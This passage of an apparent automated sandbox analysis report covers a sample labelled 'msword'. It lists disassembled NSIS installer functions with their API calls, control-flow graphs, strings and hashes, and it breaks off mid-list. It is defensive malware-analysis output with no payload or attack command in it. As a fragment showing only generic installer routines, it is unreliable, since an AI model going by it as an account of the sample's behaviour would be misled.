                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                        • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                        • API String ID: 608394941-1650083594
                                                                                        • Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                        • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                        • Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                        • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                                        Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • lstrcatW.KERNEL32(00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                        • CompareFileTime.KERNEL32(-00000014,?,WarsFeltMadridFarmsPee,WarsFeltMadridFarmsPee,00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$WarsFeltMadridFarmsPee
                                                                                        • API String ID: 4286501637-4051260161
                                                                                        • Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                        • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                        • Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                        • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                                        Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 653 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 656 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 653->656 657 4035d7-4035dc 653->657 665 403615 656->665 666 4036fc-40370a call 4032d2 656->666 658 4037b6-4037ba 657->658 668 40361a-403631 665->668 672 403710-403713 666->672 673 4037c5-4037ca 666->673 670 403633 668->670 671 403635-403637 call 403336 668->671 670->671 677 40363c-40363e 671->677 675 403715-40372d call 403368 call 403336 672->675 676 40373f-403769 GlobalAlloc call 403368 call 40337f 672->676 673->658 675->673 703 403733-403739 675->703 676->673 701 40376b-40377c 676->701 679 403644-40364b 677->679 680 4037bd-4037c4 call 4032d2 677->680 685 4036c7-4036cb 679->685 686 40364d-403661 call 405e0c 679->686 680->673 689 4036d5-4036db 685->689 690 4036cd-4036d4 call 4032d2 685->690 686->689 700 403663-40366a 686->700 697 4036ea-4036f4 689->697 698 4036dd-4036e7 call 407281 689->698 690->689 697->668 702 4036fa 697->702 698->697 700->689 706 40366c-403673 700->706 707 403784-403787 701->707 708 40377e 701->708 702->666 703->673 703->676 706->689 709 403675-40367c 706->709 710 40378a-403792 707->710 708->707 709->689 711 40367e-403685 709->711 710->710 712 403794-4037af SetFilePointer call 405e0c 710->712 711->689 713 403687-4036a7 711->713 716 4037b4 712->716 713->673 715 4036ad-4036b1 713->715 717 4036b3-4036b7 715->717 718 4036b9-4036c1 715->718 716->658 717->702 717->718 718->689 719 4036c3-4036c5 718->719 719->689
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00403598
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                        Strings
                                                                                        • Inst, xrefs: 0040366C
                                                                                        • Null, xrefs: 0040367E
                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                        • Error launching installer, xrefs: 004035D7
                                                                                        • soft, xrefs: 00403675
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                        • API String ID: 4283519449-527102705
                                                                                        • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                        • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                        • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                        • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                                        Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 720 40337f-403396 721 403398 720->721 722 40339f-4033a7 720->722 721->722 723 4033a9 722->723 724 4033ae-4033b3 722->724 723->724 725 4033c3-4033d0 call 403336 724->725 726 4033b5-4033be call 403368 724->726 730 4033d2 725->730 731 4033da-4033e1 725->731 726->725 732 4033d4-4033d5 730->732 733 4033e7-403407 GetTickCount call 4072f2 731->733 734 403518-40351a 731->734 735 403539-40353d 732->735 746 403536 733->746 748 40340d-403415 733->748 736 40351c-40351f 734->736 737 40357f-403583 734->737 739 403521 736->739 740 403524-40352d call 403336 736->740 741 403540-403546 737->741 742 403585 737->742 739->740 740->730 755 403533 740->755 744 403548 741->744 745 40354b-403559 call 403336 741->745 742->746 744->745 745->730 757 40355f-403572 WriteFile 745->757 746->735 751 403417 748->751 752 40341a-403428 call 403336 748->752 751->752 752->730 758 40342a-403433 752->758 755->746 759 403511-403513 757->759 760 403574-403577 757->760 761 403439-403456 call 407312 758->761 759->732 760->759 762 403579-40357c 760->762 765 40350a-40350c 761->765 766 40345c-403473 GetTickCount 761->766 762->737 765->732 767 403475-40347d 766->767 768 4034be-4034c2 766->768 769 403485-4034b6 MulDiv wsprintfW call 404f72 767->769 770 40347f-403483 767->770 771 4034c4-4034c7 768->771 772 4034ff-403502 768->772 778 4034bb 769->778 770->768 770->769 775 4034e7-4034ed 771->775 776 4034c9-4034db WriteFile 771->776 772->748 773 403508 772->773 773->746 777 4034f3-4034f7 775->777 776->759 779 4034dd-4034e0 776->779 777->761 781 4034fd 777->781 778->768 779->759 780 4034e2-4034e5 779->780 780->777 781->746
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 004033E7
                                                                                        • GetTickCount.KERNEL32 ref: 00403464
                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                        • wsprintfW.USER32 ref: 004034A4
                                                                                        • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                        • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                        • String ID: ... %d%%$P1B$X1C$X1C
                                                                                        • API String ID: 651206458-1535804072
                                                                                        • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                        • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                        • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                        • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                                        Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 782 404f72-404f85 783 405042-405044 782->783 784 404f8b-404f9e 782->784 785 404fa0-404fa4 call 406805 784->785 786 404fa9-404fb5 lstrlenW 784->786 785->786 788 404fd2-404fd6 786->788 789 404fb7-404fc7 lstrlenW 786->789 792 404fe5-404fe9 788->792 793 404fd8-404fdf SetWindowTextW 788->793 790 405040-405041 789->790 791 404fc9-404fcd lstrcatW 789->791 790->783 791->788 794 404feb-40502d SendMessageW * 3 792->794 795 40502f-405031 792->795 793->792 794->795 795->790 796 405033-405038 795->796 796->790
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                        • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                        • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                        • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2740478559-0
                                                                                        • Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                        • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                        • Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                        • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                        Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 797 401eb9-401ec4 798 401f24-401f26 797->798 799 401ec6-401ec9 797->799 800 401f53-401f7b GlobalAlloc call 406805 798->800 801 401f28-401f2a 798->801 802 401ed5-401ee3 call 4062a3 799->802 803 401ecb-401ecf 799->803 816 4030e3-4030f2 800->816 817 402387-40238d GlobalFree 800->817 805 401f3c-401f4e call 406009 801->805 806 401f2c-401f36 call 4062a3 801->806 814 401ee4-402702 call 406805 802->814 803->799 807 401ed1-401ed3 803->807 805->817 806->805 807->802 813 401ef7-402e50 call 406009 * 3 807->813 813->816 829 402708-40270e 814->829 817->816 829->816
                                                                                        APIs
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • GlobalFree.KERNELBASE(007ED550), ref: 00402387
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeGloballstrcpyn
                                                                                        • String ID: Exch: stack < %d elements$Pop: stack empty$WarsFeltMadridFarmsPee
                                                                                        • API String ID: 1459762280-1231270740
                                                                                        • Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                        • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                        • Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                        • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                                        Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 832 4022fd-402325 call 40145c GetFileVersionInfoSizeW 835 4030e3-4030f2 832->835 836 40232b-402339 GlobalAlloc 832->836 836->835 837 40233f-40234e GetFileVersionInfoW 836->837 839 402350-402367 VerQueryValueW 837->839 840 402384-40238d GlobalFree 837->840 839->840 843 402369-402381 call 405f51 * 2 839->843 840->835 843->840
                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                        • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                        • GlobalFree.KERNELBASE(007ED550), ref: 00402387
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3376005127-0
                                                                                        • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                        • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                        • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                        • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                        Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 848 402b23-402b37 GlobalAlloc 849 402b39-402b49 call 401446 848->849 850 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 848->850 855 402b70-402b73 849->855 850->855 856 402b93 855->856 857 402b75-402b8d call 405f6a WriteFile 855->857 858 4030e3-4030f2 856->858 857->856 862 402384-40238d GlobalFree 857->862 862->858
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                        • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
